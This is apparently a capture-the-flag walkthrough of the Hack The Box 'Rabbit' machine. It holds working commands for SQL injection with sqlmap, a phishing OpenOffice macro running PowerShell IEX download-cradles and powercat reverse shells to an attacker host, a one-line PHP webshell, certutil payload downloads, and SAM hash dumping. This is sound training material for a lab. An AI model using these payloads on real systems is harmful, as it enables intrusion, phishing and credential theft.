Today we are going to solve retired Rabbit presented by Hack the Box for making online penetration practices.
Level: Intermediate
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Rabbit is is 10.10.10.71 so let’s start with a basic nmap port enumeration.
root@kali:~/htb/rabbit# nmap -sC -sV 10.10.10.71 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-21 15:10 EST Stats: 0:01:05 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 87.50% done; ETC: 15:11 (0:00:09 remaining) Stats: 0:03:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 95.31% done; ETC: 15:13 (0:00:02 remaining) Nmap scan report for rabbit.htb.local (10.10.10.71) Host is up (0.086s latency). Not shown: 976 closed ports PORT STATE SERVICE VERSION 25/tcp open smtp Microsoft Exchange smtpd | smtp-commands: Rabbit.htb.local Hello [10.10.14.7], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW, |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT | smtp-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: RABBIT | DNS_Domain_Name: htb.local | DNS_Computer_Name: Rabbit.htb.local | DNS_Tree_Name: htb.local |_ Product_Version: 6.1.7601 |_ssl-date: 2020-01-22T01:14:17+00:00; +5h01m29s from scanner time. 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 80/tcp open http Microsoft IIS httpd 7.5 |_http-server-header: Microsoft-IIS/7.5 |_http-title: 403 - Forbidden: Access is denied. 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-22 01:12:03Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 443/tcp open ssl/https? |_ssl-date: 2020-01-22T01:14:17+00:00; +5h01m29s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 |_ SSL2_DES_192_EDE3_CBC_WITH_MD5 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 587/tcp open smtp Microsoft Exchange smtpd | smtp-commands: Rabbit.htb.local Hello [10.10.14.7], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT | smtp-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: RABBIT | DNS_Domain_Name: htb.local | DNS_Computer_Name: Rabbit.htb.local | DNS_Tree_Name: htb.local |_ Product_Version: 6.1.7601 |_ssl-date: 2020-01-22T01:14:17+00:00; +5h01m29s from scanner time. 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 808/tcp open ccproxy-http? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? 3306/tcp open mysql MySQL 5.7.19 | mysql-info: | Protocol: 10 | Version: 5.7.19 | Thread ID: 10 | Capabilities flags: 63487 | Some Capabilities: LongPassword, LongColumnFlag, SupportsCompression, DontAllowDatabaseTableColumn, Support41Auth, ConnectWithDatabase, IgnoreSigpipes, InteractiveClient, SupportsTransactions, Speaks41ProtocolOld, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins | Status: Autocommit | Salt: i".rs\x0Bb58A\x0D\x0E\x01[s\x0F\SKd |_ Auth Plugin Name: mysql_native_password 6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6005/tcp open msrpc Microsoft Windows RPC 6006/tcp open msrpc Microsoft Windows RPC 6007/tcp open msrpc Microsoft Windows RPC 8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31 |_http-title: Example Service Info: Host: RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1 Host script results: |_clock-skew: mean: 5h01m29s, deviation: 0s, median: 5h01m28s |_smb2-time: Protocol negotiation failed (SMB2) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 339.55 seconds
root@kali:~/htb/rabbit# gobuster -e -k -u http://10.10.10.71:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.71:8080/ [+] Threads : 20 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 200,204,301,302,307,403 [+] Expanded : true [+] Timeout : 10s ===================================================== 2019/05/13 10:30:07 Starting gobuster ===================================================== http://10.10.10.71:8080/index (Status: 200) http://10.10.10.71:8080/Index (Status: 200) http://10.10.10.71:8080/favicon (Status: 200) http://10.10.10.71:8080/%!(NOVERB) (Status: 403) http://10.10.10.71:8080/INDEX (Status: 200) http://10.10.10.71:8080/joomla (Status: 301) http://10.10.10.71:8080/*checkout* (Status: 403) http://10.10.10.71:8080/complain (Status: 301)
We found a Complain Management System
root@kali:~/htb/rabbit# searchsploit 'complain management system' ------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------------------------------------------------------------- ---------------------------------------- Complain Management System - Hard-Coded Credentials / Blind SQL injection | exploits/php/webapps/42968.txt Complain Management System - SQL injection | exploits/php/webapps/41131.txt
root@kali:~/htb/rabbit# cat /usr/share/exploitdb/exploits/php/webapps/42968.txt # Exploit Title : Complain Management System Blind SQL Injection # Date: 10 October 2017 # Exploit Author: havysec # Tested on: ubuntu14.04 # Vendor: https://sourceforge.net/projects/complain-management-system/ # Version: not supplied # Download Software: https://sourceforge.net/projects/complain-management-system/files ## About The Product : Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain. ## Vulnerability : The functions.php file line 88 has hardcoded admin credentials. elseif($uType == 'admin'){ //$_SESSION['user_id'] = $row['sid']; if($userName == 'admin' && $password == 'admin123'){ $_SESSION['user_id'] = 0; $_SESSION['user_name'] = 'Administrator'; $_SESSION['user_type'] = 'admin'; header('Location: '.WEB_ROOT.'index.php'); exit; Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.
As we read, the first thing will be to register as ‘ Customer ‘ and with the cookie PHPSESSID + sqlmap get access to the databases.
.
c:\SQLMAP>type rabbit.req POST /complain/process.php?action=assignComplain HTTP/1.1 Host: 10.10.10.71:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: nl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://10.10.10.71:8080/complain/view.php?mod=admin&view=viewByCompID&compId=10 Content-Type: application/x-www-form-urlencoded Content-Length: 53 Connection: close Cookie: PHPSESSID=82k6csju4c0ccdepcbnan5k602 Upgrade-Insecure-Requests: 1 compId=10&compDesc=&engId=6&btnLogin=+Assing+Complain+ c:\SQLMAP>
c:\SQLMAP>python sqlmap.py -r rabbit.req --dbms=mysql -p "compId" --risk=3 --level=3 --batch -D secret --dump ___ __H__ ___ ___[(]_____ ___ ___ {1.2.11.19#dev} |_ -| . [)] | .'| . | |___|_ [']_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 15:16:49 /2019-05-15/ [15:16:49] [INFO] parsing HTTP request from 'rabbit.req' [15:16:49] [INFO] testing connection to the target URL sqlmap got a 302 redirect to 'http://10.10.10.71:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y [15:16:50] [INFO] heuristics detected web page charset 'ISO-8859-2' [15:16:50] [INFO] checking if the target is protected by some kind of WAF/IPS [15:16:50] [INFO] testing if the target URL content is stable [15:16:51] [INFO] heuristic (basic) test shows that POST parameter 'compId' might be injectable (possible DBMS: 'MySQL') [15:16:51] [INFO] testing for SQL injection on POST parameter 'compId' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y --snip-- do you want to crack them via a dictionary-based attack? [Y/n/q] Y [15:18:21] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file 'c:\SQLMAP\txt\wordlist.zip' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [15:18:21] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [15:18:21] [INFO] starting dictionary-based cracking (md5_generic_passwd) [15:18:21] [INFO] starting 4 processes [15:18:2515:18:25] [] [INFOINFO] cracked password '] current status: 15091... /barcelona' for user 'Malek' [15:18:31] [INFO] cracked password 'popcorn' for user 'Dumah' [15:18:32] [INFO] cracked password 'santiago' for user 'Moebius' [15:18:56] [INFO] cracked password 'pussycatdolls' for user 'Ariel' Database: secret Table: users [10 entries] +----------+--------------------------------------------------+ | Username | Password | +----------+--------------------------------------------------+ | Zephon | 13fa8abd10eed98d89fd6fc678afaf94 | | Kain | 33903fbcc0b1046a09edfaa0a65e8f8c | | Dumah | 33da7a40473c1637f1a2e142f4925194 (popcorn) | | Magnus | 370fc3559c9f0bff80543f2e1151c537 | | Raziel | 719da165a626b4cf23b626896c213b84 | | Moebius | a6f30815a43f38ec6de95b9a9d74da37 (santiago) | | Ariel | b9c2538d92362e0e18e52d0ee9ca0c6f (pussycatdolls) | | Turel | d322dc36451587ea2994c84c9d9717a1 | | Dimitri | d459f76a5eeeed0eca8ab4476c144ac4 | | Malek | dea56e47f1c62c30b83b70eb281a6c39 (barcelona) | +----------+--------------------------------------------------+ [15:19:04] [INFO] table 'secret.users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.10.71\dump\secret\users.csv' [15:19:04] [INFO] fetched data logged to text files under 'C:\Users\jacco\.sqlmap\output\10.10.10.71' [*] ending @ 15:19:04 /2019-05-15/
Exploitation
Where do we use these obtained credentials now? Let’s try in
https://10.10.10.71/owa
We use found valid credentials:
Ariel:pussycatdolls
Once we have entered to the /owa the first thing will be to check the mails:
As we read in these emails, we could use a malicious Open Office to get shell but considering the PowerShell constraint and the Windows Defender
In metasploit there’s an exploit that could work:
exploit/multi/misc/openoffice_document_macro
We rename the file obtained to zip and edit the file replacing the payload by:
powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd
Sub Exploit Shell("cmd.exe /C ""powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.7/powercat.ps1');powercat -c 10.10.14.7 -p 1234 -e cmd;""") End Sub
Send an email to all, containing our malicious .odt file:
Two years later, the answer to resolving headaches with attachments in Outlook Web Access (OWA) remains unchanged: Use Internet Explorer, not Edge, not Chrome, not Firefox.
And now we wait for it to be executed by an user. (This will take appprox 7 minutes, if it doesn’t after 10 reset the box.
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.71 - - [21/Jan/2020 14:25:45] "GET /powercat.ps1 HTTP/1.1" 200
root@kali:~/htb/rabbit# rlwrap nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.71] 43040 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Program Files (x86)\OpenOffice 4\program>whoami whoami htb\raziel C:\Program Files (x86)\OpenOffice 4\program>type c:\users\raziel\desktop\user.txt type c:\users\raziel\desktop\user.txt c6f45142bea818fe729cef32342aae9c C:\Program Files (x86)\OpenOffice 4\program>
Post-Exploitation
c:\>dir wamp64 dir wamp64 Volume in drive C has no label. Volume Serial Number is AEA8-5415 Directory of c:\wamp64 10/28/2017 11:13 AM <DIR> . 10/28/2017 11:13 AM <DIR> .. 10/28/2017 12:19 PM <DIR> alias 10/28/2017 11:13 AM <DIR> apps 12/31/2010 09:39 AM 4,790 barimage.bmp 10/28/2017 11:15 AM <DIR> bin 10/28/2017 11:13 AM <DIR> cgi-bin 01/08/2017 10:13 AM 28,470 images_off.bmp 01/08/2017 10:13 AM 28,470 images_on.bmp 09/01/2017 04:30 PM 3,978 install-english.txt 10/28/2017 11:13 AM <DIR> lang 11/06/2015 11:00 AM 8,156 license-english.txt 10/28/2017 11:18 AM <DIR> logs 09/01/2017 09:44 AM 5,741 mariadb_support_en.txt 09/01/2017 04:20 PM 1,289 read_after_install-english.txt 10/28/2017 11:13 AM <DIR> scripts 05/13/2019 12:44 PM <DIR> tmp 10/28/2017 11:16 AM 4,038,372 unins000.dat 10/28/2017 11:13 AM 1,401,105 unins000.exe 10/28/2017 11:13 AM 185 uninstall_services.bat 10/29/2017 10:32 PM 2,086 wampmanager.conf 09/03/2008 03:46 PM 1,233,408 wampmanager.exe 11/16/2017 07:57 PM 546,316 wampmanager.ini 08/30/2017 09:28 AM 29,431 wampmanager.tpl 05/13/2019 01:56 PM <DIR> www 14 File(s) 7,331,797 bytes 11 Dir(s) 25,699,479,552 bytes free c:\>
We see that the Web service of port 8080 is served by Wamp64. Sometimes this service is run as system.
Let’s see if we have write permissions and who’s running it:
c:\>cacls wamp64 cacls wamp64 c:\wamp64 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Administrators:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R BUILTIN\Users:(CI)(ID)(special access:) FILE_APPEND_DATA BUILTIN\Users:(CI)(ID)(special access:) FILE_WRITE_DATA CREATOR OWNER:(OI)(CI)(IO)(ID)F c:\>
Let’s upload a php webshell:
c:\Python37>type puckie.php <?php echo shell_exec($_GET["cmd"]); ?>
c:\Python37>python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 - 10.10.10.71 - - [13/May/2019 14:57:26] "GET /puckie.php HTTP/1.1" 200 -
c:\Users\Raziel\Desktop>certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php **** Online **** 0000 ... 002c CertUtil: -URLCache command completed successfully.
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=whoami nt authority\system
root.txt = 0b2ded66e5a49dd1620be30110f43d54
Now we can read the flag and even get shell as System easily.
root@kali#curl http://10.10.10.71:8080/puckie.php?cmd=powershell.exe%20-version%202%20IEX%20(New-Object%20System.Net.Webclient).DownloadString(%27http://10.10.14.7/powercat.ps1%27);powercat%20-c%2010.10.14.7%20-p%20443%20-e%20cmd
root@kali:~/htb/rabbit# rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.71] 29105 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\wamp64\www>whoami whoami nt authority\system C:\wamp64\www>
Just for Fun
root@kali:~/htb/rabbit# curl http://10.10.10.71:8080/puckie.php?cmd=netstat%20-p%20TCP%20%20-a Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:25 Rabbit:0 LISTENING TCP 0.0.0.0:80 Rabbit:0 LISTENING TCP 0.0.0.0:88 Rabbit:0 LISTENING TCP 0.0.0.0:135 Rabbit:0 LISTENING TCP 0.0.0.0:389 Rabbit:0 LISTENING TCP 0.0.0.0:443 Rabbit:0 LISTENING TCP 0.0.0.0:445 Rabbit:0 LISTENING TCP 0.0.0.0:464 Rabbit:0 LISTENING TCP 0.0.0.0:587 Rabbit:0 LISTENING TCP 0.0.0.0:593 Rabbit:0 LISTENING TCP 0.0.0.0:636 Rabbit:0 LISTENING TCP 0.0.0.0:808 Rabbit:0 LISTENING TCP 0.0.0.0:3268 Rabbit:0 LISTENING TCP 0.0.0.0:3269 Rabbit:0 LISTENING TCP 0.0.0.0:3306 Rabbit:0 LISTENING TCP 0.0.0.0:5722 Rabbit:0 LISTENING TCP 0.0.0.0:5985 Rabbit:0 LISTENING TCP 0.0.0.0:6001 Rabbit:0 LISTENING TCP 0.0.0.0:6002 Rabbit:0 LISTENING TCP 0.0.0.0:6003 Rabbit:0 LISTENING TCP 0.0.0.0:6004 Rabbit:0 LISTENING TCP 0.0.0.0:6005 Rabbit:0 LISTENING TCP 0.0.0.0:6006 Rabbit:0 LISTENING TCP 0.0.0.0:6007 Rabbit:0 LISTENING TCP 0.0.0.0:6008 Rabbit:0 LISTENING TCP 0.0.0.0:6010 Rabbit:0 LISTENING TCP 0.0.0.0:6011 Rabbit:0 LISTENING TCP 0.0.0.0:6019 Rabbit:0 LISTENING TCP 0.0.0.0:6144 Rabbit:0 LISTENING TCP 0.0.0.0:8080 Rabbit:0 LISTENING TCP 0.0.0.0:9389 Rabbit:0 LISTENING TCP 0.0.0.0:17914 Rabbit:0 LISTENING TCP 0.0.0.0:22039 Rabbit:0 LISTENING TCP 0.0.0.0:22050 Rabbit:0 LISTENING TCP 0.0.0.0:22093 Rabbit:0 LISTENING TCP 0.0.0.0:22102 Rabbit:0 LISTENING TCP 0.0.0.0:22116 Rabbit:0 LISTENING TCP 0.0.0.0:22126 Rabbit:0 LISTENING TCP 0.0.0.0:22156 Rabbit:0 LISTENING TCP 0.0.0.0:22161 Rabbit:0 LISTENING TCP 0.0.0.0:22174 Rabbit:0 LISTENING TCP 0.0.0.0:22179 Rabbit:0 LISTENING TCP 0.0.0.0:22187 Rabbit:0 LISTENING TCP 0.0.0.0:22202 Rabbit:0 LISTENING TCP 0.0.0.0:22211 Rabbit:0 LISTENING TCP 0.0.0.0:22231 Rabbit:0 LISTENING TCP 0.0.0.0:22253 Rabbit:0 LISTENING TCP 0.0.0.0:47001 Rabbit:0 LISTENING TCP 0.0.0.0:64327 Rabbit:0 LISTENING TCP 0.0.0.0:64337 Rabbit:0 LISTENING TCP 10.10.10.71:53 Rabbit:0 LISTENING TCP 10.10.10.71:8080 10.10.14.7:44038 ESTABLISHED TCP 10.10.10.71:29105 10.10.14.7:https ESTABLISHED TCP 10.10.10.71:43040 10.10.14.7:1234 ESTABLISHED TCP 127.0.0.1:53 Rabbit:0 LISTENING root@kali:~/htb/rabbit#
root@kali:~/htb# rlwrap nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.71] 36031 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\wamp64\www>certutil -urlcache -split -f http://10.10.14.7/plink.exe c:\windows\system32\spool\drivers\color\plink.exe certutil -urlcache -split -f http://10.10.14.7/plink.exe c:\windows\system32\spool\drivers\color\plink.exe **** Online **** 000000 ... 04c000 CertUtil: -URLCache command completed successfully. C:\wamp64\www>cd c:\windows\system32\spool\drivers\color cd c:\windows\system32\spool\drivers\color c:\Windows\System32\spool\drivers\color>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.7 .\plink.exe -R 5985:127.0.0.1:5985 10.10.14.7 login as: puck puck@10.10.14.7's password: iestyle Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 Last login: Thu Jan 16 06:33:03 2020 from 10.10.10.167 Could not chdir to home directory /home/puck: No such file or directory $
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i HTB.LOCAL -u puck -p 'IEstyle' Info: Starting Evil-WinRM shell v1.6 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\puck\Documents> whoami htb\puck *Evil-WinRM* PS C:\Users\puck\Documents> hostname Rabbit
Get those hashes
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.71 - - [21/Jan/2020 15:21:07] "GET /CQHashDumpv2.exe HTTP/1.1" 200 - 10.10.10.71 - - [21/Jan/2020 15:21:08] "GET /CQHashDumpv2.exe HTTP/1.1" 200 -
c:\Users\Public>certutil -urlcache -split -f http://10.10.14.7/CQHashDumpv2.exe c:\users\public\cq.exe certutil -urlcache -split -f http://10.10.14.7/CQHashDumpv2.exe c:\users\public\cq.exe **** Online **** 000000 ... 015000 CertUtil: -URLCache command completed successfully. c:\Users\Public>cq.exe cq.exe cq by Michal Grzegorzewski, mgrzeg@cqure.pl Usage: cq /samdump /dccdump /sam /sec /sys Available parameters: --samdump Dump hashes from the SAM database --dccdump Dump Domain Cached Credentials --sam=VALUE Path to the SAM reg file --sec=VALUE Path to the SECURITY reg file --sys=VALUE Path to the SYSTEM reg file --newmsdcc=VALUE Binary string with new MSDCC2 --pass=VALUE New password --user=VALUE User name for new MSDCC2 Providing any: /sam /sec or /sys switch enables offline analysis. In offline mode /samdump enforces /sam and /sys, and /dccdump enforces /sys and /sec. Online mode requires access to the SECURITY registry, which by default is accessible only by the SYSTEM account. Credits Offline registry parser based on the TheWindowsNTRegistryFileFormat by Timothy D.Morgan. Interesting registry entries, calculations from the CredDump7 toolkit. Argument parsing by NDesk.Options. c:\Users\Public>cq.exe --samdump cq.exe --samdump SAM hashes: Administrator:500:aad3b435b51404eeaad3b435b51404ee:edbc4b98df3bb5d9fca20d0d759f62c6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:edbc4b98df3bb5d9fca20d0d759f62c6::: c:\Users\Public>
Author: Puckiestyle
Reference used : https://ironhackers.es/en/writeups/writeup-rabbit-hackthebox/